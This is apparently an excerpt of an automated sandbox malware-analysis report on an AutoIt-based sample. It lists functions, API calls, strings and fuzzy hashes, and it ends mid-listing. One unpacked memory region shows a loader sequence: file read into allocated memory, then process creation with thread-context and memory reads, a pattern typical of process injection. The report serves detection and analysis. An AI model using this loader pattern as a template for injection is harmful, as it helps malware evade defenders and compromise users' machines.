                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673809921.00000000017CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CC000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_17cc000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFileFreeVirtual
                                                                        • String ID:
                                                                        • API String ID: 204039940-0
                                                                        • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                        • Instruction ID: 389ad907d25e7f395bf06f7ed9019e983249eb3d3d532f2bc8cc1a6ce4b61dd5
                                                                        • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                        • Instruction Fuzzy Hash: 10A1F974E00209EBDB14CFA8C958BEEFBB5BF48704F10819DE515AB281DB759A41CFA4
                                                                        Function 00E749FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1130 e749fb-e74a25 call e7bcce RegOpenKeyExW 1133 ee41cc-ee41e3 RegQueryValueExW 1130->1133 1134 e74a2b-e74a2f 1130->1134 1135 ee4246-ee424f RegCloseKey 1133->1135 1136 ee41e5-ee4222 call e8f4ea call e747b7 RegQueryValueExW 1133->1136 1141 ee423d-ee4245 call e747e2 1136->1141 1142 ee4224-ee423b call e76a63 1136->1142 1141->1135 1142->1141
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00E74A1D
                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00EE41DB
                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00EE421A
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00EE4249
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue$CloseOpen
                                                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                                                        • API String ID: 1586453840-614718249
                                                                        • Opcode ID: e7eba74b787c1601398ce6df4d7708ad82fbc7d5af265f5088d9a33348b24d08
                                                                        • Instruction ID: 9259f405eb4a40129c0daf3fb4f5ec6a046006f62f1e143dd9bcc59be37b6bfb
                                                                        • Opcode Fuzzy Hash: e7eba74b787c1601398ce6df4d7708ad82fbc7d5af265f5088d9a33348b24d08
                                                                        • Instruction Fuzzy Hash: 71113DB1A01109BFEB04ABA5CD86DBF7BBDEF44344F005059F506E6191EB709E05E750
                                                                        Function 00E736B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1157 e736b8-e73728 CreateWindowExW * 2 ShowWindow * 2
                                                                        APIs
                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E736E6
                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E73707
                                                                        • ShowWindow.USER32(00000000,?,?,?,?,00E73AA3,?), ref: 00E7371B
                                                                        • ShowWindow.USER32(00000000,?,?,?,?,00E73AA3,?), ref: 00E73724
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CreateShow
                                                                        • String ID: AutoIt v3$edit
                                                                        • API String ID: 1584632944-3779509399
                                                                        • Opcode ID: e5b269c7a71eb1a5ddfe058fbabdfe5c69e4fb5b1caa21af5b21a20530794faa
                                                                        • Instruction ID: 43da41b9cf16d3db0af2ed4dc7b5b4e9d557fdb2bc67040bf2d94bb00eadb809
                                                                        • Opcode Fuzzy Hash: e5b269c7a71eb1a5ddfe058fbabdfe5c69e4fb5b1caa21af5b21a20530794faa
                                                                        • Instruction Fuzzy Hash: 7AF03AB06402D87AE7305757AC4CE773E7FE7C6F30B00401BBA08A62A1C2650885EAB0
                                                                        Function 00E97B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1158 e97b47-e97b53 call e9123a call e97e23 1163 e97b5d-e97b70 call e97e6d 1158->1163 1164 e97b55-e97b5c call e97bbd 1158->1164 1163->1164 1169 e97b72-e97b7a call e96986 1163->1169 1171 e97b7f-e97b85 1169->1171 1172 e97bb4-e97bbc call e97bbd 1171->1172 1173 e97b87-e97b97 call e97ec9 1171->1173 1173->1172 1178 e97b99-e97bb3 call e97a94 GetCurrentThreadId 1173->1178
                                                                        APIs
                                                                        • __init_pointers.LIBCMT ref: 00E97B47
                                                                          • Part of subcall function 00E9123A: __initp_misc_winsig.LIBCMT ref: 00E9125E
                                                                          • Part of subcall function 00E9123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00E97F51
                                                                          • Part of subcall function 00E9123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00E97F65
                                                                          • Part of subcall function 00E9123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00E97F78
                                                                          • Part of subcall function 00E9123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00E97F8B
                                                                          • Part of subcall function 00E9123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00E97F9E
                                                                          • Part of subcall function 00E9123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00E97FB1
                                                                          • Part of subcall function 00E9123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00E97FC4
                                                                          • Part of subcall function 00E9123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00E97FD7
                                                                          • Part of subcall function 00E9123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00E97FEA
                                                                          • Part of subcall function 00E9123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00E97FFD
                                                                          • Part of subcall function 00E9123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00E98010
                                                                          • Part of subcall function 00E9123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00E98023
                                                                          • Part of subcall function 00E9123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00E98036
                                                                          • Part of subcall function 00E9123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00E98049
                                                                          • Part of subcall function 00E9123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00E9805C
                                                                          • Part of subcall function 00E9123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00E9806F
                                                                        • __mtinitlocks.LIBCMT ref: 00E97B4C
                                                                          • Part of subcall function 00E97E23: InitializeCriticalSectionAndSpinCount.KERNEL32(00F2AC68,00000FA0,?,?,00E97B51,00E95E77,00F26C70,00000014), ref: 00E97E41
                                                                        • __mtterm.LIBCMT ref: 00E97B55
                                                                          • Part of subcall function 00E97BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00E97B5A,00E95E77,00F26C70,00000014), ref: 00E97D3F
                                                                          • Part of subcall function 00E97BBD: _free.LIBCMT ref: 00E97D46
                                                                          • Part of subcall function 00E97BBD: DeleteCriticalSection.KERNEL32(00F2AC68,?,?,00E97B5A,00E95E77,00F26C70,00000014), ref: 00E97D68
                                                                        • __calloc_crt.LIBCMT ref: 00E97B7A
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00E97BA3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                        • String ID:
                                                                        • API String ID: 2942034483-0
                                                                        • Opcode ID: f505eefc0630607a3f32fea9374b3e3e6cea33b58f84abb75f7856823fd4defd
                                                                        • Instruction ID: 9ced037f657f0987cea9049437fa97d7196d338b1cb9dab51bd98f8417a82c27
                                                                        • Opcode Fuzzy Hash: f505eefc0630607a3f32fea9374b3e3e6cea33b58f84abb75f7856823fd4defd
                                                                        • Instruction Fuzzy Hash: 9AF0BB3253D3121AEE3977347C0764B3BD6AF01734B202699F8E4F50E1FF21884A4160
                                                                        Function 017CE7B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 145fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1285 17ce7b0-17ce8db call 17cc400 call 17ce6a0 CreateFileW 1292 17ce8dd 1285->1292 1293 17ce8e2-17ce8f2 1285->1293 1294 17ce992-17ce997 1292->1294 1296 17ce8f9-17ce913 VirtualAlloc 1293->1296 1297 17ce8f4 1293->1297 1298 17ce915 1296->1298 1299 17ce917-17ce92e ReadFile 1296->1299 1297->1294 1298->1294 1300 17ce930 1299->1300 1301 17ce932-17ce96c call 17ce6e0 call 17cd6a0 1299->1301 1300->1294 1306 17ce96e-17ce983 call 17ce730 1301->1306 1307 17ce988-17ce990 ExitProcess 1301->1307 1306->1307 1307->1294
                                                                        APIs
                                                                          • Part of subcall function 017CE6A0: Sleep.KERNELBASE(000001F4), ref: 017CE6B1
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 017CE8D1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673809921.00000000017CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CC000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_17cc000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFileSleep
                                                                        • String ID: L2N6Z3FUWAMLXO3I7AW81QCFI
                                                                        • API String ID: 2694422964-219300842
                                                                        • Opcode ID: 73c7524c4513338557feef578c1673ddf4fd89be33b4bb4aa800eb17af5b6707
                                                                        • Instruction ID: 4135f0c3dfae7faf199dc1b00fb50fd20cad91f8e92b88663fad1161d76f4dd8
                                                                        • Opcode Fuzzy Hash: 73c7524c4513338557feef578c1673ddf4fd89be33b4bb4aa800eb17af5b6707
                                                                        • Instruction Fuzzy Hash: 4F518170D04289DAEB11DBA8C858BEEFFB89F15704F04419DE6487B2C1D6B91B44CBA6
                                                                        Function 00E751AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00E7522F
                                                                        • _wcscpy.LIBCMT ref: 00E75283
                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E75293
                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00EE3CB0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                        • String ID: Line:
                                                                        • API String ID: 1053898822-1585850449
                                                                        • Opcode ID: d10ee431ad741aea453faf8c2e86644a36a79a8ceda0a56152353405ba969a0e
                                                                        • Instruction ID: ac9a89cf4c528d85fe792bb910b43fae6d9f92d09359da5a3a75259baacb909d
                                                                        • Opcode Fuzzy Hash: d10ee431ad741aea453faf8c2e86644a36a79a8ceda0a56152353405ba969a0e
                                                                        • Instruction Fuzzy Hash: CC31A4720087446FD724EB60EC46FDE77E8AF44314F10991EF58DA2192DBB0A648CB96
                                                                        Function 00E74139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E741A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00E739FE,?,00000001), ref: 00E741DB
                                                                        • _free.LIBCMT ref: 00EE36B7
                                                                        • _free.LIBCMT ref: 00EE36FE
                                                                          • Part of subcall function 00E7C833: __wsplitpath.LIBCMT ref: 00E7C93E
                                                                          • Part of subcall function 00E7C833: _wcscpy.LIBCMT ref: 00E7C953
                                                                          • Part of subcall function 00E7C833: _wcscat.LIBCMT ref: 00E7C968
                                                                          • Part of subcall function 00E7C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00E7C978
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                        • API String ID: 805182592-1757145024
                                                                        • Opcode ID: c22488be0ebb2732c0021478b154919707f85db1eadb2a745eb125863673b21d
                                                                        • Instruction ID: 72972d76b5bccfc7bb6141b0cc666b96c0dab7b75167dd0f804c641f5f6f50d9
                                                                        • Opcode Fuzzy Hash: c22488be0ebb2732c0021478b154919707f85db1eadb2a745eb125863673b21d
                                                                        • Instruction Fuzzy Hash: 80915C71910259AFCF04EFB5CC959EEB7B4BF09314F50942AF81ABB291DB309A05CB90
                                                                        Function 00E74A30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E75374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00F31148,?,00E761FF,?,00000000,00000001,00000000), ref: 00E75392
                                                                          • Part of subcall function 00E749FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00E74A1D
                                                                        • _wcscat.LIBCMT ref: 00EE2D80
                                                                        • _wcscat.LIBCMT ref: 00EE2DB5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscat$FileModuleNameOpen
                                                                        • String ID: \$\Include\
                                                                        • API String ID: 3592542968-2640467822
                                                                        • Opcode ID: 0026d5e09f70033398a6ddd4f4ecffb9d05a4568423c66475e76b29c17cb43aa
                                                                        • Instruction ID: 0de7a0b808893d195f4d05aca166614b715ed9e2b6f9c8ddf4db4c01d48aafab
                                                                        • Opcode Fuzzy Hash: 0026d5e09f70033398a6ddd4f4ecffb9d05a4568423c66475e76b29c17cb43aa
                                                                        • Instruction Fuzzy Hash: 5851D6714043489FC744FF55EE8189AB3F9FF59320B80992EF748A3261EB709908EB52
                                                                        Function 00E934AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __getstream.LIBCMT ref: 00E934FE
                                                                          • Part of subcall function 00E97C0E: __getptd_noexit.LIBCMT ref: 00E97C0E
                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00E93539
                                                                        • __wopenfile.LIBCMT ref: 00E93549
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                        • String ID: <G
                                                                        • API String ID: 1820251861-2138716496
                                                                        • Opcode ID: 01a64062827332ed476760429fa5f17c2998e38860f0339033573f9bbe9ff98e
                                                                        • Instruction ID: 5aa8b0432a5d2cb0dcf3d73b052f1cb0bde8c122868a8080929cd448cad8eeba
                                                                        • Opcode Fuzzy Hash: 01a64062827332ed476760429fa5f17c2998e38860f0339033573f9bbe9ff98e
                                                                        • Instruction Fuzzy Hash: E9110A70A003069BDF21BF709C426AF76E4AF49754B169425E825F7281EB34CA0197A1
                                                                        Function 00E8D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00E8D28B,SwapMouseButtons,00000004,?), ref: 00E8D2BC
                                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00E8D28B,SwapMouseButtons,00000004,?,?,?,?,00E8C865), ref: 00E8D2DD
                                                                        • RegCloseKey.KERNELBASE(00000000,?,?,00E8D28B,SwapMouseButtons,00000004,?,?,?,?,00E8C865), ref: 00E8D2FF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID: Control Panel\Mouse
                                                                        • API String ID: 3677997916-824357125
                                                                        • Opcode ID: 88f850f9bd26b8e7c0daa535ececd558dc5c5488a7bacc0a98d1c05acb49add2
                                                                        • Instruction ID: e7b9c5e0cc16052cbedaa28ce38999a0dbc58d626aab6572446c754678078997
                                                                        • Opcode Fuzzy Hash: 88f850f9bd26b8e7c0daa535ececd558dc5c5488a7bacc0a98d1c05acb49add2
                                                                        • Instruction Fuzzy Hash: BD115775619208FFDB20AFA5CC84EAE7BB8EF44744B005469B809E7160E631AE449B60
                                                                        Function 017CD6A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 017CDE5B
                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 017CDEF1
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 017CDF13
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673809921.00000000017CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CC000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_17cc000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 2438371351-0
                                                                        • Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                                        • Instruction ID: ac36c833371baad6d8f90b5476d6b69856d93ac254187321aa639300c291251b
                                                                        • Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                                        • Instruction Fuzzy Hash: BC621A30A14658DBEB24CFA4C854BDEB772EF58700F1091ADD20DEB290EB759E81CB59
                                                                        Function 00EBC396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E74517: _fseek.LIBCMT ref: 00E7452F
                                                                          • Part of subcall function 00EBC56D: _wcscmp.LIBCMT ref: 00EBC65D
                                                                          • Part of subcall function 00EBC56D: _wcscmp.LIBCMT ref: 00EBC670
                                                                        • _free.LIBCMT ref: 00EBC4DD
                                                                        • _free.LIBCMT ref: 00EBC4E4
                                                                        • _free.LIBCMT ref: 00EBC54F
                                                                          • Part of subcall function 00E91C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00E97A85), ref: 00E91CB1
                                                                          • Part of subcall function 00E91C9D: GetLastError.KERNEL32(00000000,?,00E97A85), ref: 00E91CC3
                                                                        • _free.LIBCMT ref: 00EBC557
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                        • String ID:
                                                                        • API String ID: 1552873950-0
                                                                        • Opcode ID: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                                        • Instruction ID: 6acec3faa6abf18ea221d73ac4e84c316c50266f4ae346f6f8308a186a2aee38
                                                                        • Opcode Fuzzy Hash: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                                        • Instruction Fuzzy Hash: 64514FB1904219AFDF149F64DC81BEEBBB9EF48304F1050AEB25DB3241DB715A808F58
                                                                        Function 00E740E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00EE3725
                                                                        • GetOpenFileNameW.COMDLG32 ref: 00EE376F
                                                                          • Part of subcall function 00E7660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E753B1,?,?,00E761FF,?,00000000,00000001,00000000), ref: 00E7662F
                                                                          • Part of subcall function 00E740A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E740C6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                                        • String ID: X
                                                                        • API String ID: 3777226403-3081909835
                                                                        • Opcode ID: d612a80dc64df70f324a029ac8b9fee7a1e613f7e2acd21f8f37b28e5f936f97
                                                                        • Instruction ID: 505bc988809bd5d95445bbdd65cf28026488943aa7799afa7632e5495c2dddae
                                                                        • Opcode Fuzzy Hash: d612a80dc64df70f324a029ac8b9fee7a1e613f7e2acd21f8f37b28e5f936f97
                                                                        • Instruction Fuzzy Hash: 9D21A8B1A10198AFCF01DFD4D8457EE7BF99F49304F009059E509F7281DBB45A898F65
                                                                        Function 00EBC71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00EBC72F
